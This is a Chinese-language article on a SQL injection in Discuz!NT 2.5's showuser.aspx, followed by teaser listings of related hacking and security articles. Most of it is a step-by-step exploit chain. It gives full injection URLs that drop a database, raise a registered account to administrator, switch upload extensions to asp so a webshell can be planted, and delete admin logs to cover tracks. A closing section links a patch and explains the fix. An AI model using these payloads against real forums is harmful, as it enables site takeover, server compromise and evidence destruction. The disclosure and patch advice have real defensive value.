bb系统discuz!nt 2.5漏洞介绍 如何防范discuz!nt 2.5漏洞?
Discuz!NT是一款功能强大的基于ASP.net平台的BBS系统,占有不少的市场份额,特别是一些大中型专业社区都采用该系统。最近,ISTO成员在其最新的2.5版本中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。下面笔者部署环境解析该漏洞,以期引起大家的重视。
环境描述
操作系统:Windows 2003
Discuz!NT版本:2.5
URL:http://www.gslw.com
数据库:SQL Server 2005
1、漏洞起因
漏洞是由showuser.aspx文件引起的,该文件的作用是显示论坛的会员列表。由于脚本中对于用来用户排序的ordertype参数未经过滤而直接查询数据库,攻击者可以通过精心构造的ordertype参数进行数据库的写操作。(图1)
2、漏洞测试
判断Discuz!NT是否存在该漏洞,我们可以构造ordertype参数进程测试。下面代码的意思是删除gslw数据库,由于不存在gslw数据库因此会报错“无法对数据库'glsw'执行删除,因为它不存在,或者您没有所需的权限。”这就说明执行了数据库操作,我们可以根据错误信息判断是否存在该漏洞。我们构造的URl为
http://www.gslw.com/showuser.aspx?ordertype=desc;drop database glsw;--
显示的错误页面见图1,说明存在该漏洞。(图2)
3、用户提权
打开论坛注册一个用户为hacker的会员见图3,然后我们可以进行构造一段URL通过showuser.aspx的ordertype参数将hacker提升为管理员。构造的URL为“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='hacker';--”其作用就是将注册用户hacker的adminid和guoupid设置为1,也就是将其提升为管理员。将该URL输入浏览器地址栏回车后可以看到hacker被提升为管理员见图4。(图3)(图4)
hacker被提升为管理员后就可以登录系统后台进行各种操作了。Discuz!NT的后台功能确实比较强大,(图5)
4、更改上传格式
该漏洞除了可以提升管理员为,还可以更改默认的附件上传格式。默认情况下,Discuz!NT只支持jpg,gif,png,zip,rar,jpeg格式的附件上传,利用该漏洞可以将其中的某种格式替换为asp、aspx等可执行脚本的格式,从而获得一个Webshell。我们可以构造URL更改其上传文件格式,比如我们将jgp格式更改为aspx格式,就可以构造这样的URL“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';--” ,最终的执行效果见图6。(图6)
5、获得Webshell
通过上面的操作我们就可以在任意一论坛版块下发表新主题 ,然后通过附件上传功能将以asp木马上传到服务器。上传完成后,在“我的附件”项下可以找到上传的asp木马,点击该asp网马就直接运行,登录后获得一个webshell。(图7)
6、清除痕迹
获得webshell后,就可以通过该漏洞构造URL清除痕迹,恢复Discuz!NT的默认状态。主要包括一下几项:
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp';-- 改回jpg格式
http://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker';-- 清除日志
http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker';-- hacker降权限
7、总结及防范
从上面的演示可以看到该漏洞对采用Discuz!NT的BBS威胁极大,攻击者不仅能够进入后台,而且可以获取webshell,进而渗透控制服务器。笔者上面演示用的是asp木马,如果用aspx木马其权限将更大,拿下服务器将会更容易。
针对此漏洞Discuz!NT官方提供了补丁,该补丁的地址为:
http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip
修正方法是将压缩包中的Discuz.Web.dll文件上传到bin目录,覆盖掉以前的文件。虽然Discuz!NT比较迅速地发布了补丁,但是笔者在此刻进行了安全测试,有相当多的采用Discuz!NT 2.5系统的BBS论坛依旧没有打该补丁。希望通过此文,能够引起大家对该漏洞的重视,尽快修复漏洞。
玩传世游戏时木马盗号 木马盗号怎么预防?
玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号,那个厉害阿。以至于现在上网都怕怕,怕中招。好废话不说,来分析一下木
详情2018-01-10 17:54:09责编:llp 来源:驱动管家微博账号被盗怎么找回?怎么保护自己的微博账号小心被盗?
微博账号受相关法规保护QQ账号和微博账号都属于个人财产,虽然网络账号被盗取暂时还没有明确的相关法律规定。但国家已经发布了互联网管理的基础性法规《互联网信息服务管理办法》进行规范,也已经设立相关的网络
详情2018-01-15 16:04:21责编:llp 来源:驱动管家密码破解软件dubrute怎么用?讲解爆破3389服务器的方法
DUBrute是一款强大的远程桌面(3389)密码破解软件,你可以用本附件的扫描功能来自动扫描活跃IP地址,扫描完成后设置好用户名与需要猜解的密码就可以开始全自动工作了。只要你密码设置的好相信会有很大的收获哦。33
详情2018-02-03 18:08:50责编:llp 来源:驱动管家什么是网络爬虫?网络爬虫不安全体现在哪些方面?
网络爬虫概述网络爬虫(Web Crawler),又称网络蜘蛛(Web Spider)或网络机器人(Web Robot),是一种按照一定的规则自动抓取万维网资源的程序或者脚本,已被广泛应用于互联网领域。搜索引擎使用网络爬虫抓取Web网
详情2018-01-14 16:58:40责编:llp 来源:驱动管家dsrm密码如何同步?dsrm密码同步有哪些影响?
前言本文将会讲解在获取到域控权限后如何利用DSRM密码同步将域管权限持久化。不是科普文,废话不多说。环境说明:域控:Windows Server 2008 R2域内主机:Windows XPDSRM密码同步这里使用系统安装域时内置的
详情2018-02-03 19:59:16责编:llp 来源:驱动管家sqlmap用户手册 sqlmap支持的数据库有哪些?
当给sqlmap这么一个url的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返
详情2018-01-23 12:42:46责编:llp 来源:驱动管家电脑系统非法入侵的防范措施是什么?这七步设置可以防范非法入侵
本文通过七步设置介绍了针对Windows 2000和Windows XP操作系统如何防范非法用户入侵的“七招”。第一招:屏幕保护在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,
详情2018-01-24 20:07:28责编:llp 来源:驱动管家忘记windows xp系统密码怎么办?这里有几种可以破解登录密码的方法
Windows XP的使用过程中如果你是一个很容易遗忘的人,那么一定不要忘记在第一次设置密码的同时创建一张可以恢复Windows XP中的账户密码的启动盘,它可以让你免去格式化硬盘的烦恼。从“控制面板”中找到“用户
详情2018-02-04 15:25:16责编:llp 来源:驱动管家boblog漏洞代码 boblog任意变量覆盖漏洞分析
BoBlogBoBlog是一款基于PHP的、以MySQL为数据库支持的免费blog程序,存在着任意变量覆盖漏洞。该漏洞代码如下: go php$q_url=$_SERVER[ "REQUEST_URI "];@list($relativePath, $rawURL)=@explode(& 39; go php
详情2018-01-26 17:05:29责编:llp 来源:驱动管家asp木马怎么破解?asp木马破解密码的步骤
破解目标:破解一asp木马的经过加密的登破解asp木马密码陆密码。由于木马里没有版本说明,具体也不知道这木马叫什么名。破解思路:两种,用加密后的密码替换密文和利用密文及加密算法反解出密码。前者根本算不上
详情2018-01-12 18:07:30责编:llp 来源:驱动管家
- 如何运用组策略来关闭win7驱动的自动更新?
- YY浏览器缓存在哪儿清除?清除浏览器缓存的方法
- 电商也要转方向了?在线购物逐渐走向线下实体店
- 【游戏攻略】绝地求生刚枪党资源点推荐 跳这肯定有枪
- 杀毒软件哪个比较好?金山毒霸和360杀毒对比
- 拨号上网提示宽带连接错误是什么原因?常见宽带连接错误代码解析
- 酷派5950简单化刷机教程 酷派5950刷机的具体步骤
- 神舟x50ts值得买吗?这里有一份神舟x50ts测评参考
- 路由器桥接后上不了网怎么办?路由器桥接常见问题解决办法
- 怎么进行mac欺骗?mac欺骗攻击实战
- Softcam软件是什么?Softcam怎么用?
- 本地连接ip地址设置步骤是什么?本地连接ip地址设置方法
- 【游戏攻略】绝地求生豪宅构造介绍 萌新打法攻略
- 【游戏问题】Ping值匹配机制已上线 玩家常见问题FAQ
- 【游戏资讯】绝地求生国服地图曝光 与玩家叫法相差无几
- USB键盘插入电脑后无法识别是什么原因?该如何解决
- 酷派s6默认关闭的usb调试如何打开?
- 金立m6splus有哪些亮点?金立m6splus多少钱?
- ip地址冲突是什么意思?ip地址冲突怎么解决?
- tom网的跨站测试 163网的跨站测试